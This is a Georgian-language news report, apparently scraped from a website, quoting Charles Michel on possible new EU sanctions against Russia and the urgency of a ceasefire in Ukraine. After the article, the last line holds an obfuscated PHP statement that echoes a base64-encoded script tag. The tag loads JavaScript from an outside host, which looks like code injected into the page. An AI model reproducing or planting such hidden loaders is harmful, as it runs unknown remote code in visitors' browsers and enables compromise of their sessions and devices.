celsiusi
ავერსი შნაიდერი
ევროპული საბჭოს პრეზიდენტი შარლ მიშელი CNN-თან საუბრისას არ გამორიცხავს, რუსეთის წინააღმდეგ სანქციების მომდევნო პაკეტი გააქტიურდეს.
 
მისივე თქმით, ისინი აიძულებენ პუტინს, მიუჯდეს მოლაპარაკების მაგიდას. როგორც შარლ მიშელი ამბობს, ახლა ყველაზე სასწრაფო უკრაინაში ცეცხლის შეწყვეტის საკითხი და ჰუმანიტარული ვითარებაა.
 
"ჩვენ ვიცით, რომ სიტუაცია არის ექსტრემალურად რთული, არაპროგნოზირებადი და დაძაბული. არ ვიცით, რა იქნება შემდეგ დღეებსა თუ კვირებში. ჩვენი პოლიტიკური ლიდერების მოვალეობაა, მივიღოთ სწორი გადაწყვეტილებები. შემდგომი პერიოდი იქნება ფუნდამენტური მნიშვნელობის.
 
ვიმედოვნებ, რომ ყველა სახის სანქცია, რაც დავაწესეთ, ეფექტურ შედეგებს გამოიღებს. ვიმედოვნებ, რომ ეს უზარმაზარი ზეწოლა პუტინის და მის რეჟიმის წინააღმდეგ ვითარებას შეცვლის. ჩვენ ვაიძულებთ პუტინს, მიუჯდეს მოლაპარაკების მაგიდას.
 
ახლა კი ყველაზე სასწრაფო არის უკრაინაში ჰუმანიტარული ვითარება და ცეცხლის შეწყვეტის საკითხი. მიზნის მისაღწევად ყველა ბერკეტს გამოვიყენებთ, შესაძლებელია გავააქტიუროთ სანქციების მორიგი პაკეტიც.
 
თუ ჩვენ ვიქნებით ერთიანი და მტკიცე, მაშინ უფრო გამოჩნდება სიტუაციის უკეთესობისკენ შეცვლის შესაძლებლობა. ჩვენ დავეხმარებით უკრაინას.
 
მინდა კიდევ ერთხელ აღვნიშნო, რომ ჩვენ არ ვართ რუსეთთან ომში. რუსეთმა წამოიწყო ომი უკრაინასთან. იქიდან გამომდინარე, რომ უკრაინა არ არის ნატოს წევრი ქვეყანა, ამიტომ ყველაფერს ვაკეთებთ მის დასახმარებლად. მხედველობაში ვიღებთ რა იმ ფაქტს, რომ რუსეთს ბირთვული იარაღი აქვს, უნდა ავირიდოთ თავიდან მესამე მსოფლიო ომი. ეს ექსტრემალურად საშიში სიტუაციაა, ჩვენ უნდა დავეხმაროთ უკრაინას წინააღმდეგობა გაუწიოს და გადარჩეს. ჩვენ გვსურს სამიზნეში ამოვიღოთ რუსეთის ეკონომიკა, რომ მოვახდინოთ პუტინზე პოლიტიკური ზეწოლა,"- განაცხადა შარლ მიშელმა.
 
 
1086
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");